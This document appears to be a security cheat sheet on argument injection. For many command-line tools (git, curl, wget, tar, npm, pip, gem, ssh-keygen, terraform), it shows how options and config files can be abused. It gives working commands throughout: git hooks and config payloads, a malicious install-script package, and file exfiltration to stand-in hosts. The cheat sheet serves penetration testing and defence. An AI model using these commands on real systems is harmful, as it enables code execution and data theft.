Argument Injection
awk
system
awk supports the system() function, which executes shell commands:
$ awk 'BEGIN {system("cmdname arg1 arg2")}' /dev/null
# executes the command once for every line in the file
$ awk 'system("cmdname arg1 arg2")' /path/to/file
If spaces cannot be inserted, sprintf can be used to bypass the restriction:
$ awk 'BEGIN{system(sprintf("cmdname%carg1",32))}'
References:
bundler
bundle install
bundle install uses gem under the hood, therefore it is possible to reuse gem's features to an attacker's advantage.
Gemfile
A Gemfile describes the gem dependencies required to execute associated Ruby code. Since it is a Ruby file, you can write arbitrary code that will be executed when running bundle install.
# Gemfile
# arbitrary code here
system('echo "hola!"')
When bundle install is run, the arbitrary Ruby code will be executed.
$ bundle install
hola!
hola!
The Gemfile specifies no dependencies
Resolving dependencies...
Bundle complete! 0 Gemfile dependencies, 1 gem now installed.
gem dependency
Since bundler uses gem install to install the dependencies specified in the Gemfile, you can use extensions to embed arbitrary code.
# hola.gemspec file
Gem::Specification.new do |s|
  s.name = 'hola'
  s.version = '0.0.0'
  s.summary = "Hola!"
  s.description = "A simple hello world gem"
  s.authors = ["Nick Quaranto"]
  s.email = 'nick@quaran.to'
  s.files = []
  s.homepage = 'https://rubygems.org/gems/hola'
  s.license = 'MIT'
  s.extensions = ['extconf.rb']
end
# extconf.rb
# arbitrary code here
system('echo "hola!"')
# build and push to rubygems.org
$ gem build hola.gemspec
$ gem push ./hola-0.0.0.gem
# Gemfile
source 'https://rubygems.org'
gem 'hola'
When bundle install is run, the arbitrary Ruby code will be executed.
$ gem install ./hola-0.0.0.gem
Building native extensions. This could take a while...
ERROR: Error installing hola-0.0.0.gem:
ERROR: Failed to build gem native extension.
...
hola!
...
References:
git dependency
One of the sources of gems for bundler is a git repository with a gem's source code. Since a git repository contains source code, bundler builds the gem before installing it. Therefore, you can write arbitrary code that will be executed when running bundle install.
Create a repository on github.com with the following hola.gemspec file:
# arbitrary code here
system('echo "hola!"')
Gem::Specification.new do |s|
  s.name = 'hola'
  s.version = '0.0.0'
  s.summary = "Hola!"
  s.description = "A simple hello world gem"
  s.authors = ["Nick Quaranto"]
  s.email = 'nick@quaran.to'
  s.files = []
  s.homepage = 'https://rubygems.org/gems/hola'
  s.license = 'MIT'
end
Add the repository to the Gemfile as a git dependency.
# Gemfile
gem 'hola', :git => 'https://github.com/username/hola'
When bundle install is run, the arbitrary Ruby code will be executed.
$ bundle install
Fetching https://github.com/username/hola
hola!
Resolving dependencies...
Using bundler 2.2.21
Using hola 0.0.0 from https://github.com/username/hola (at main@4a4a4ee)
Bundle complete! 1 Gemfile dependency, 2 gems now installed.
References:
path dependency
You can specify that a gem is located in a particular location on the file system. Relative paths are resolved relative to the directory containing the Gemfile. Since the local directory contains the gem's source code, bundler builds it before installing. Therefore, you can write arbitrary code that will be executed when running bundle install.
Similar to the semantics of the :git option, the :path option requires that the directory in question either contains a .gemspec for the gem, or that you specify an explicit version that bundler should use. Therefore, you can gain code execution using a .gemspec file with arbitrary code or a built gem with a native extension.
# Gemfile
# .gemspec file is located in vendor/hola
gem 'hola', :path => "vendor/hola"
# Gemfile
# vendor/hola contains hola-0.0.0.gem file
gem 'hola', '0.0.0', :path => "vendor/hola"
When bundle install is run, the arbitrary Ruby code will be executed.
$ bundle install
hola!
Resolving dependencies...
Using hola 0.0.0 from source at `vendor/hola`
Using bundler 2.2.21
Bundle complete! 1 Gemfile dependency, 2 gems now installed.
References:
curl
curl can be used to exfiltrate local files or write arbitrary content to them.
# sending local files using a POST request
$ curl --data @/path/to/local/file https://website.com
$ curl -F 'var=@/path/to/local/file' https://website.com
$ curl --upload-file /path/to/local/file https://website.com
# writing a response to a local file
$ curl https://website.com/payload.txt -o /path/to/local/file
Additionally, the file: scheme can be used to read or copy local files:
# read a local file
$ curl file:///path/to/local/file
# copy a local file to a new place
$ curl file:///path/to/local/file -o /path/to/another/local/file
References:
find
exec
The -exec option can be used to execute arbitrary commands:
$ find . -name not_existing -or -exec cmdname arg1 arg2 \; -quit
$ find . -exec cmdname arg1 arg2 \; -quit
# read a file
$ find /path/to/file -exec cat {} \; -quit
References:
execdir
-execdir is similar to -exec, but the specified command is run from the subdirectory containing the matched items. -execdir can be used to execute arbitrary commands:
$ find . -name not_existing -or -execdir cmdname arg1 arg2 \; -quit
$ find . -execdir cmdname arg1 arg2 \; -quit
# read a file
$ find /path/to/file -execdir cat {} \; -quit
fprintf
-fprintf can be used to write to local files:
$ find . -fprintf /path/to/file 'arbitrary content here' -quit
References:
gem
gem build
A gemspec file is a Ruby file that defines what is in the gem, who made it, and the version of the gem. Since it is a Ruby file, you can write arbitrary code that will be executed when running gem build.
# hola.gemspec file
# arbitrary code here
system('echo "hola!"')
Gem::Specification.new do |s|
  s.name = 'hola'
  s.version = '0.0.0'
  s.summary = "Hola!"
  s.description = "A simple hello world gem"
  s.authors = ["Nick Quaranto"]
  s.email = 'nick@quaran.to'
  s.files = []
  s.homepage = 'https://rubygems.org/gems/hola'
  s.license = 'MIT'
end
When gem build is run, the arbitrary Ruby code will be executed.
$ gem build hola.gemspec
hola!
Successfully built RubyGem
Name: hola
Version: 0.0.0
File: hola-0.0.0.gem
References:
gem install
Extensions
A gemspec allows you to define extensions to build when installing a gem. Many gems use extensions to wrap libraries that are written in C with a Ruby wrapper. gem uses extconf.rb to build an extension during installation. Since it is a Ruby file, you can write arbitrary code that will be executed when running gem install.
# hola.gemspec file
Gem::Specification.new do |s|
  s.name = 'hola'
  s.version = '0.0.0'
  s.summary = "Hola!"
  s.description = "A simple hello world gem"
  s.authors = ["Nick Quaranto"]
  s.email = 'nick@quaran.to'
  s.files = []
  s.homepage = 'https://rubygems.org/gems/hola'
  s.license = 'MIT'
  s.extensions = ['extconf.rb']
end
# extconf.rb
# arbitrary code here
system('echo "hola!"')
$ gem build hola.gemspec
Successfully built RubyGem
Name: hola
Version: 0.0.0
File: hola-0.0.0.gem
When gem install is run, the arbitrary Ruby code will be executed.
$ gem install ./hola-0.0.0.gem
Building native extensions. This could take a while...
ERROR: Error installing hola-0.0.0.gem:
ERROR: Failed to build gem native extension.
...
hola!
...
References:
git
-c/--config-env
-c <name>=<value> passes a configuration parameter to the command, while --config-env=<name>=<envvar> takes the value from the named environment variable. The value given overrides values from configuration files. Check out the Abuse via .git/config section to find parameters that can be abused.
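For instance, a minimal sketch reusing the core.gitProxy parameter demonstrated in the core.gitProxy section below (pwn.sh and the target repository are placeholders; --config-env requires a git version that supports it):
$ echo $'#!/bin/bash\nid >&2' > pwn.sh
$ chmod +x pwn.sh
# -c takes the value directly on the command line
$ git -c core.gitProxy="./pwn.sh" clone git://github.com/user/project.git
# --config-env reads the value from the named environment variable instead
$ PROXY_PAYLOAD="./pwn.sh" git --config-env=core.gitProxy=PROXY_PAYLOAD clone git://github.com/user/project.git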
Abusing git directory
A git directory maintains an internal state, or metadata, relating to a git repository. It is created on a user's machine when:
The user runs git init to initialise an empty local repository
The user runs git clone <repository> to clone an existing repository from a remote location
The structure of a git directory is documented at https://git-scm.com/docs/gitrepository-layout
Note that a git directory is often, but not always, a directory named .git at the root of a repo. There are several variables that can redefine its path:
The GIT_COMMON_DIR environment variable or the commondir file specifies a path from which non-worktree files, which are normally in $GIT_DIR, will be taken.
Notice that bare repositories do not have a .git directory at all.
References:
Abuse via .git/config
.git/config allows for the configuration of options on a per-repo basis. Many of the options allow for the specification of commands that will be executed in various situations, but some of these situations only arise when a user interacts with a git repository in a particular way.
There are at least the following ways to set the options:
On a system-wide basis using the /etc/gitconfig file
On a global basis using the ~/.config/git/config or ~/.gitconfig files
On a local per-repo basis using the .git/config file
On a local per-repo basis using the .git/config.worktree file; this is optional and only searched when extensions.worktreeConfig is present in .git/config
On a local per-repo basis using the git -c/--config-env options
On a local per-repo basis using the git-clone -c/--config option
core.gitProxy
core.gitProxy gives a command that will be executed when establishing a connection to a remote using the git:// protocol.
$ echo $'#!/bin/bash\necho \\"Pwned as $(id)\\">&2' > pwn.sh
$ chmod +x pwn.sh
$ git clone -c core.gitProxy="./pwn.sh" git://github.com/user/project.git
Cloning into 'project'...
"Pwned as uid=0(root) gid=0(root) groups=0(root)"
fatal: Could not read from remote repository.
Please make sure you have the correct access rights and the repository exists.
core.fsmonitor
The core.fsmonitor option is used as a command which will identify all files that may have changed since the requested date/time. In other words, many operations provided by git will invoke the command given by core.fsmonitor to quickly limit the operation's scope to known-changed files in the interest of performance.
At least the following git operations invoke the command given by core.fsmonitor:
git status, used to show information about the state of the working tree, including whether any files have uncommitted changes
git add <pathspec>, used to stage changes for committing to the repo
git rm --cached <file>, used to unstage changes
git commit, used to commit staged changes
git checkout <pathspec>, used to check out a file, commit, tag, branch, etc.
For operations that take a filename, core.fsmonitor will fire even if the filename provided does not exist.
$ cd $(mktemp -d)
# initialized empty Git repository in /tmp/tmp.hLncfRcxgC/.git/
$ git init
# change core.fsmonitor so that it echoes a message to STDERR whenever it is invoked
$ echo $'\tfsmonitor = "echo \\"Pwned as $(id)\\">&2; false"' >> .git/config
$ cat .git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
fsmonitor = "echo \"Pwned as $(id)\">&2; false"
# git-status
$ git status
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
On branch main
No commits yet
nothing to commit (create/copy files and use "git add" to track)
# git-add
$ touch aaaa
$ git add aaaa
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
$ git add zzzz
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
fatal: pathspec 'zzzz' did not match any files
# git-commit
$ git commit -m 'add aaaa'
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
[main (root-commit) 7c2f2c6] add aaaa
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 aaaa
References:
core.hooksPath
core.hooksPath sets a different path for hooks. You can create a post-checkout hook within a repository, set the path to hooks with hooksPath, and execute arbitrary code.
$ git clone "<REPO>" target_directory
$ cd target_directory
$ mkdir hooks
$ echo "#!/bin/sh" > hooks/post-checkout
$ echo "echo 'arbitrary code here'" >> hooks/post-checkout
$ chmod +x hooks/post-checkout
$ # commit and push
To execute the payload, run git-clone:
$ git clone -c core.hooksPath=hooks "<REPO>"
References:
core.pager
core.pager specifies a text viewer for use by Git commands (e.g., less). The value is meant to be interpreted by the shell and can be used to execute arbitrary commands.
For example, in the following snippet git-grep has the --open-files-in-pager option, which uses the default pager from core.pager if no value is specified in the arguments:
$ mkdir repo
$ cd repo
$ git init
$ echo "random" > hop
$ git add .
$ git -c core.pager='cmdname arg1 arg2 #' grep --open-files-in-pager .
If the pager value is not directly set by a user, the order of preference is:
The GIT_PAGER environment variable
The core.pager configuration
The PAGER environment variable
The default chosen at compile time (usually less)
So, the following snippet can also be used to execute commands:
$ mkdir repo
$ cd repo
$ git init
$ echo "random" > hop
$ git add .
$ GIT_PAGER='id #' git grep --open-files-in-pager .
core.sshCommand
core.sshCommand gives a command that will be executed when establishing a connection to a remote using the SSH protocol. If this variable is set, git fetch and git push will use the specified command instead of ssh when they need to connect to a remote system.
$ echo $'#!/bin/bash\necho \\"Pwned as $(id)\\">&2' > pwn.sh
$ chmod +x pwn.sh
$ git clone -c core.sshCommand="./pwn.sh" git@github.com:user/project.git
# or
$ git clone -c core.sshCommand="./pwn.sh" ssh://github.com/user/project.git
Cloning into 'project'...
"Pwned as uid=0(root) gid=0(root) groups=0(root)"
fatal: Could not read from remote repository.
Please make sure you have the correct access rights and the repository exists.
diff.external
diff.external gives a command that will be used instead of git's internal diff function.
$ echo $'#!/bin/bash\necho \\"Pwned as $(id)\\">&2' > pwn.sh
$ chmod +x pwn.sh
$ git clone https://github.com/user/project.git
$ cd project
$ git -c diff.external="../pwn.sh" diff HEAD 480e4c9
"Pwned as uid=0(root) gid=0(root) groups=0(root)"
filter.<driver>.clean and filter.<driver>.smudge
filter.<driver>.clean is used to convert the content of a worktree file to a blob upon checkin.
filter.<driver>.smudge is used to convert the content of a blob object to a worktree file upon checkout.
$ cd $(mktemp -d)
# initialized empty Git repository in /tmp/tmp.hLncfRcxgC/.git/
$ git init
# set filter.<driver>.clean and filter.<driver>.smudge
# so that they echo a message to STDERR whenever they are invoked
$ echo $'[filter "any"]\n\tsmudge = echo \\"Pwned smudge as $(id)\\">&2\n\tclean = echo \\"Pwned clean as $(id)\\">&2' >> ./.git/config
# add filter to .gitattributes
$ touch example
$ git add ./example
$ git commit -m 'commit'
$ echo "* text filter=any" > .gitattributes
$ git status
Pwned clean as uid=0(root) gid=0(root) groups=0(root)
On branch master
Untracked files:
(use "git add <file>..." to include in what will be committed)
.gitattributes
nothing added to commit but untracked files present (use "git add" to track)
$ git add .gitattributes
Pwned clean as uid=0(root) gid=0(root) groups=0(root)
$ cd $(mktemp -d)
# initialized empty Git repository in /tmp/tmp.hLncfRcxgC/.git/
$ git init
# set filter.<driver>.clean and filter.<driver>.smudge
# so that they echo a message to STDERR whenever they are invoked
$ echo $'[filter "any"]\n\tsmudge = echo \\"Pwned smudge as $(id)\\">&2\n\tclean = echo \\"Pwned clean as $(id)\\">&2' >> ./.git/config
# add filter to .gitattributes
$ echo "* text filter=any" > .gitattributes
$ git fetch
$ git checkout main
Pwned smudge as uid=0(root) gid=0(root) groups=0(root)
Pwned smudge as uid=0(root) gid=0(root) groups=0(root)
Branch 'main' set up to track remote branch 'main' from 'origin'.
Switched to a new branch 'main'
References:
http.proxy and http.<URL>.proxy
http.proxy or http.<URL>.proxy override the HTTP proxy. You can use this to get SSRF:
$ git clone -c http.proxy=http://attacker-website.com -- "<REPO>" target_directory
$ git clone -c http.http://website.com/.proxy=http://attacker-website.com -- "<REPO>" target_directory
Pay attention to other http.* configs and remote.<name>.proxy; they can help to increase the impact.
References:
Abuse via .git/hooks/
Various files within .git/hooks/ are executed upon certain git operations. For example:
pre-commit and post-commit are executed before and after a commit operation respectively
post-checkout is executed after a checkout operation
pre-push is executed before a push operation
On filesystems that differentiate between executable and non-executable files, hooks are only executed if the respective file is executable. Furthermore, hooks only execute given certain user interaction, such as upon performing a commit.
For instance, you can use bare repositories to deliver custom git hooks and execute arbitrary code:
# clone or create a repo
$ git clone "<REPO>" target_directory
$ cd target_directory
# add subproject as a bare repo
$ mkdir subproject
$ cd subproject
$ git init --bare
# add malicious hook
$ echo "#!/bin/sh" > hooks/post-checkout
$ echo "echo 'arbitrary code here'" >> hooks/post-checkout
$ chmod +x hooks/post-checkout
# commit and push
If the vulnerable code executes the following bash commands against the prepared repository, it will trigger the custom hook execution and result in the arbitrary code being executed:
$ git clone -- "<REPO>" "target_directory"
$ cd "target_directory"
$ git checkout "subproject"
References:
Abuse via .git/index
You can achieve an arbitrary write primitive using a crafted .git/index file; check an advisory for details.
Abuse via .git/HEAD
It is possible to trick Git into loading a configuration from an unintended location by corrupting .git/HEAD. In such cases, Git starts looking for repositories in the current folder, which an attacker can fully control, for example, if the current folder is a working tree with all the files of the cloned remote repository. The exploitation flow may look like this:
$ git clone https://github.com/remote/repo.git
$ cd repo
# Create empty folders to comply with the expected structure of a Git repository
$ mkdir objects refs worktree
# Create non-empty HEAD to fake a valid reference
$ echo "ref: refs/heads/main" > HEAD
# Prepare a malicious config file using core.fsmonitor to execute the payload
$ echo "[core]" > config
$ echo $'\trepositoryformatversion = 0' >> config
$ echo $'\tbare = false' >> config
$ echo $'\tworktree = worktree' >> config
$ echo $'\tfsmonitor = "echo \\"Pwned as $(id)\\">&2; false"' >> config
# Corrupt the HEAD file
$ echo "" > .git/HEAD
# Exploit
$ git status
Pwned as uid=501(0xn3va)
Pwned as uid=501(0xn3va)
On branch main
No commits yet
nothing to commit (create/copy files and use "git add" to track)
References:
git-blame
--output
git-blame has the --output option, which is not documented in the manual and is usually present on other git sub-commands. Executing git blame --output=foo results in interesting behaviour:
$ git init
$ git blame --output=foo
usage: git blame [<options>] [<rev-opts>] [<rev>] [--] <file>
<rev-opts> are documented in git-rev-list(1)
--incremental show blame entries as we find them, incrementally
-b do not show object names of boundary commits (Default: off)
# ...
# Notice the presence of a new file named foo
$ ls -la foo
-rw-r--r-- 1 0xn3va staff 0 Mar 18 20:18 foo
Although the command failed, an empty file named foo was created. If a file with the same name already exists, the destination file is truncated. This option provides an arbitrary file truncation primitive. For example, an attacker can use it to corrupt a critical file in the .git folder like .git/HEAD and trick Git into loading a configuration from an unintended location; check out the Abuse via .git/HEAD section.
References:
git-clone
-c/--config
-c/--config sets a configuration variable in the newly-created repository; this takes effect immediately after the repository is initialized, but before the remote history is fetched or any files checked out. Check the Abuse via .git/config section to find variables that can be abused.
ext URLs
git-clone allows shell commands to be specified in ext:: URLs for remote repositories. For instance, the next example will execute the whoami command when trying to connect to a remote repository:
$ git clone 'ext::sh -c whoami% >&2'
References:
<directory>
git-clone allows specifying a new directory to clone into. Cloning into an existing directory is only allowed if the directory is empty. You can use this to write a repo outside a default folder.
$ git clone -- "<REPO>" target_directory
-u/--upload-pack
upload-pack specifies a non-default path for the command run on the other end when the repository to clone from is accessed via ssh. You can execute arbitrary code like this:
$ mkdir repo
$ cd repo
$ git init
$ cd -
$ echo "#!/bin/bash" > payload.sh
$ echo "echo 'arbitrary payload here'" >> payload.sh
$ chmod +x payload.sh
$ git clone --upload-pack=payload.sh repo
References:
git-diff
git-diff against /dev/null
git-diff against /dev/null can be used to read the entire content of a file, even outside the git directory.
$ git diff /dev/null /path/to/file/outside/git/repo
$ git diff /dev/null path/to/file/in/git/repo
References:
--no-index
The --no-index option can be used to turn git-diff into a normal diff against another file in the git repository, which does not have to be tracked.
References:
git-fetch
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.
$ mkdir repo
$ cd repo
$ git init
$ git fetch main --upload-pack='cmdname arg1 arg2 >&2 #'
References:
git-fetch-pack
--exec
Same as --upload-pack. Check out the section below.
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.
$ mkdir repo
$ cd repo
$ git init
$ git fetch-pack --upload-pack='cmdname arg1 arg2 >&2 #' .
git-grep
--no-index
--no-index tells git-grep to search files in the current directory that are not managed by Git. In other words, if the working directory is different from the repository directory, --no-index allows you to access files in the working directory.
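A minimal sketch (the directory and file names are hypothetical):
# search untracked files in a directory that is not managed by Git
$ cd /tmp/untrusted-dir
$ git grep --no-index "password" .
# or target a specific file
$ git grep --no-index "BEGIN RSA PRIVATE KEY" -- secret.conf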
References:
-O/--open-files-in-pager
-O/--open-files-in-pager opens the matching files in the pager. It can be used to run arbitrary commands:
$ mkdir repo
$ cd repo
$ git init
$ echo "random" > hop
$ git add .
$ git grep --open-files-in-pager='cmdname arg1 arg2 #' .
References:
git-log
--output
--output defines a specific file to output to instead of stdout. You can use this to overwrite arbitrary files.
$ git log --output=/tmp/arbitrary_file
$ cat /tmp/arbitrary_file
commit c79538fb19b1d9d21bf26e9ad30fdeb90be1eaf0
Author: User <user@local>
Date: Fri Aug 29 00:00:00 2021 +0000
Controlled content
References:
git-ls-remote
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.
$ mkdir repo
$ cd repo
$ git init
$ git ls-remote --upload-pack='cmdname arg1 arg2 >&2 #' main
References:
git-pull
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.
$ mkdir repo
$ cd repo
$ git init
$ git pull main --upload-pack='cmdname arg1 arg2 >&2 #'
References:
git-push
--receive-pack/--exec
receive-pack or exec specifies a path to the git-receive-pack program on the remote end. You can execute arbitrary code like this:
$ echo "#!/bin/bash" > payload.sh
$ echo "echo 'arbitrary payload here'" >> payload.sh
$ chmod +x payload.sh
$ git push --receive-pack=payload.sh username/repo main
# or
$ git push --exec=payload.sh username/repo main
# or
$ git push --receive-pack=payload.sh main
maven
Execution of arbitrary commands or code during mvn <PHASE> is possible through the use of various plugins, such as exec-maven-plugin or groovy-maven-plugin. In order to execute a malicious payload using the groovy-maven-plugin plugin during the phase <PHASE>, you can use the following configuration:
<plugin>
  <groupId>org.codehaus.gmaven</groupId>
  <artifactId>groovy-maven-plugin</artifactId>
  <executions>
    <execution>
      <phase><!-- PHASE_HERE --></phase>
      <goals>
        <goal>execute</goal>
      </goals>
      <configuration>
        <source>
          print "cmdname arg1 arg2".execute().text
        </source>
      </configuration>
    </execution>
  </executions>
</plugin>
For example, you can execute the plugin during mvn initialize or mvn compile using the following pom.xml file:
<?xml version="1.0" encoding="UTF-8"?>
<project>
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.mycompany.app</groupId>
  <artifactId>my-app</artifactId>
  <version>1</version>
  <build>
    <plugins>
      <plugin>
        <groupId>org.codehaus.gmaven</groupId>
        <artifactId>groovy-maven-plugin</artifactId>
        <executions>
          <execution>
            <phase>initialize</phase>
            <goals>
              <goal>execute</goal>
            </goals>
            <configuration>
              <source>
                print "cmdname arg1 arg2".execute().text
              </source>
            </configuration>
          </execution>
        </executions>
      </plugin>
    </plugins>
  </build>
</project>
References:
npm scripts
The scripts property of the package.json file supports a number of built-in scripts and their preset life cycle events as well as arbitrary scripts. These can all be executed using npm run-script, or npm run for short.
Pre and post commands with matching names will be run for those as well (e.g. premyscript, myscript, postmyscript). To create pre or post scripts for any scripts defined in the scripts section of the package.json, simply create another script with a matching name and add pre or post to the beginning of it.
In the following example npm run compress would execute these scripts as described.
{
  "scripts": {
    "precompress": "{{ executes BEFORE the `compress` script }}",
    "compress": "{{ run command to compress files }}",
    "postcompress": "{{ executes AFTER `compress` script }}"
  }
}
There are some special life cycle scripts that happen only in certain situations. These scripts happen in addition to the pre<event>, post<event>, and <event> scripts.
prepare (since npm@4.0.0)
Runs any time before the package is packed, i.e. during npm publish and npm pack
Runs BEFORE the package is packed
Runs BEFORE the package is published
Runs on local npm install without any arguments
Runs AFTER prepublish, but BEFORE prepublishOnly
NOTE: If a package being installed through git contains a prepare script, its dependencies and devDependencies will be installed, and the prepare script will be run before the package is packaged and installed
As of npm@7 these scripts run in the background. To see the output, run with --foreground-scripts
prepublish (DEPRECATED)
Does not run during npm publish, but does run during npm ci and npm install
prepublishOnly
Runs BEFORE the package is prepared and packed, ONLY on npm publish
prepack
Runs BEFORE a tarball is packed (on npm pack, npm publish, and when installing git dependencies)
NOTE: npm run pack is NOT the same as npm pack. npm run pack is an arbitrary user-defined script name, whereas npm pack is a CLI-defined command
postpack
Runs AFTER the tarball has been generated but before it is moved to its final destination (if at all, publish does not save the tarball locally)
npm cache add
npm cache add runs the following life cycle scripts:
prepare
npm ci
npm ci runs the following life cycle scripts:
preinstall
install
postinstall
prepublish
preprepare
prepare
postprepare
These all run after the actual installation of modules into node_modules, in order, with no internal actions happening in between.
npm diff
npm diff runs the following life cycle scripts:
prepare
npm install
npm install runs the following life cycle scripts (also run when you run npm install -g <pkg-name>):
preinstall
install
postinstall
prepublish
preprepare
prepare
postprepare
If there is a binding.gyp file in the root of a package and install or preinstall scripts were not defined, npm will default the install command to compile using node-gyp via node-gyp rebuild.
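For instance, a malicious package can hook these install-time events directly in its package.json. A minimal sketch (the package name and the echoed payload are placeholders):
{
  "name": "hola",
  "version": "0.0.0",
  "scripts": {
    "preinstall": "echo 'arbitrary payload here'",
    "postinstall": "echo 'arbitrary payload here'"
  }
}
When npm install pulls in such a package, the preinstall and postinstall commands run with the privileges of the user invoking npm.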
npm pack
npm pack runs the following life cycle scripts:
prepack
prepare
postpack
npm publish
npm publish runs the following life cycle scripts:
prepublishOnly
prepack
prepare
postpack
publish
postpublish
prepare will not run during --dry-run
npm rebuild
npm rebuild runs the following life cycle scripts:
preinstall
install
postinstall
prepare
prepare is only run if the current directory is a symlink (e.g. with linked packages)
npm restart
npm restart runs a restart script if it was defined; otherwise stop and start are both run if present, including their pre and post iterations:
prerestart
restart
postrestart
npm start
npm start runs the following life cycle scripts:
prestart
start
poststart
If there is a server.js file in the root of your package, then npm will default the start command to node server.js. prestart and poststart will still run in this case.
npm stop
npm stop runs the following life cycle scripts:
prestop
stop
poststop
npm test
npm test runs the following life cycle scripts:
pretest
test
posttest
pip
pip install
Extending the setuptools modules allows you to hook almost any pip command. For instance, you can use the install class within the setup.py file to execute arbitrary code while pip install is running.
from setuptools import setup
from setuptools.command.install import install

class PostInstallCommand(install):
    def run(self):
        # Insert code here
        install.run(self)

setup(
    ...
    cmdclass={
        'install': PostInstallCommand,
    },
    ...
)
When pip install is run, the PostInstallCommand.run method will be invoked.
References:
ssh
authorized_keys and id_*.pub
OpenSSH supports the command option, which specifies the command to be executed whenever a key is used for authentication.
command="cmdname arg1 arg2" ssh-ed25519 AAAAC3Nzblah....
References:
ssh_config
ssh obtains configuration data from the following sources in the following order:
Command line options
User's configuration file (~/.ssh/config)
System-wide configuration file (/etc/ssh/ssh_config)
LocalCommand
LocalCommand specifies a command to execute on the local machine after successfully connecting to the server. The following ssh_config can be used to execute arbitrary commands:
Host *
PermitLocalCommand yes
LocalCommand cmdname arg1 arg2
References:
ssh-keygen
-D
ssh-keygen can load a shared library using the -D option, which leads to arbitrary command execution:
$ ssh-keygen -D lib.so
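For example, a minimal shared library whose constructor runs a command can serve as the payload; pwn.c and lib.so are placeholder names and id stands in for an arbitrary payload:
# the constructor runs as soon as ssh-keygen loads the library,
# before it is ever used as a PKCS#11 provider
$ cat > pwn.c <<'EOF'
#include <stdlib.h>

__attribute__((constructor))
static void pwn(void) {
    system("id");
}
EOF
$ gcc -shared -fPIC -o lib.so pwn.c
$ ssh-keygen -D ./lib.so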
References:
tar
Checkpoints
A checkpoint is a moment of time before writing the n-th record to the archive (a write checkpoint), or before reading the n-th record from the archive (a read checkpoint). Checkpoints allow periodically executing arbitrary actions.
$ tar cf archive.tar --checkpoint=1 --checkpoint-action="exec=echo 'arbitrary payload here'" foo
--to-command
When the --to-command option is used, instead of creating the files specified, tar invokes the given command and pipes the contents of the files to its standard input. So it can be used to execute arbitrary commands.
# Requires valid archive file
$ tar xf file.tar --to-command='cmdname arg1 arg2'
References:
-I/--use-compress-program
-I/--use-compress-program is used to specify an external compression program command that can be abused to execute arbitrary commands:
# Does not require a valid archive
$ tar xf /dev/null --use-compress-program='cmdname arg1 arg2'
References:
terraform
terraform-plan
Terraform relies on plugins called "providers" to interact with remote systems. Terraform configurations must declare which providers they require, so that Terraform can install and use them.
You can write a custom provider, publish it to the Terraform Registry and add the provider to the Terraform code.
terraform {
  required_providers {
    evil = {
      source  = "evil/evil"
      version = "1.0"
    }
  }
}

provider "evil" {}
$ terraform init
$ terraform plan
The provider will be pulled in during terraform init, and when terraform plan is run the arbitrary code will be executed.
Additionally, Terraform offers the external provider, which provides a way to interface between Terraform and external programs. Therefore, you can use the external data source to run arbitrary code. The following example from the docs executes a Python script during terraform plan.
data "external" "example" {
  program = ["python", "${path.module}/example-data-source.py"]

  query = {
    # arbitrary map from strings to strings, passed
    # to the external program as the data query.
    id = "abc123"
  }
}
References:
wget
--use-askpass
--use-askpass specifies the command to prompt for a user and password. This option can be used to execute arbitrary commands, although without any arguments and without visible stdout/stderr.
If no command is specified, then the command in the environment variable WGET_ASKPASS is used. If WGET_ASKPASS is not set, then the command in the environment variable SSH_ASKPASS is used. Additionally, the default command for use-askpass can be set up in .wgetrc.
$ wget --use-askpass=cmdname http://0/
References:
--post-file
--post-file can be used to exfiltrate files in a POST request.
# sends a local file to a remote server
# file is sent as-is
$ wget --post-file=/path/to/file https://website.com/
References:
-O/--output-document
-O/--output-document can be used to download a remote file via a GET request and save it to a specific location.
$ wget --output-document=/path/to/file https://website.com/file.txt
# prints a file to standard output
$ wget --output-document="-" https://website.com/file.txt
References:
-o/--output-file
-o/--output-file specifies a logfile that will be used to log all messages normally reported to standard error. It can be used to write output to a file.
# reads a local file and writes the output to another local file
# displaying only non-binary files, output is an error log
$ wget --input-file=/path/to/file --output-file=/path/to/another/file
References:
-i/--input-file
-i/--input-file reads URLs from a local or external file. This option can be used to expose file content in an error message:
# file content will be displayed as error messages
$ wget --input-file=/path/to/file http://0/
References:
zip
-TT/--unzip-command
-TT/--unzip-command is used to specify a command to test an archive when the -T option is used.
$ zip archive.zip /path/to/file -T --unzip-command="cmdname arg1 arg2 #"
References: